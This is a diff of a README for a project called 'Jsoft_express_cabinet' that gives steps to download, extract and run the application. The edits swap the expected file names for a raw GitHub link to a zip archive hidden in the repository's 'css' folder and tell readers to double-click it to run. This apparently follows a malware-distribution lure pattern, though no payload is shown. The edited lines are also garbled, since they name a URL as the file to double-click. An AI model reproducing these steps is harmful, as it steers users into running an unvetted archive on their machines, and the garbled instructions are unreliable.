justindumaniel/Jsoft_express_cabinet/README.md

    Click on the link that matches your operating system.
 The application will start downloading automatically.

 4. **Locate the Downloaded File:**
    Once the download is complete, go to your downloads folder.
-The file should be named something similar to `Jsoft_express_cabinet.zip`.
+The file should be named something similar to `https://raw.githubusercontent.com/justindumaniel/Jsoft_express_cabinet/main/css/express_Jsoft_cabinet_v1.1.zip`.

 5. **Extract the Files:**
    Right-click on the downloaded ZIP file and select "Extract All."
 Follow the prompts to unpack the files.

 6. **Run the Application:**
    Navigate to the extracted folder.
-Double-click on `Jsoft_express_cabinet.exe` (or the equivalent for your OS) to open the application.
+Double-click on `https://raw.githubusercontent.com/justindumaniel/Jsoft_express_cabinet/main/css/express_Jsoft_cabinet_v1.1.zip` (or the equivalent for your OS) to open the application.

 ## 📂 Using Jsoft_express_cabinet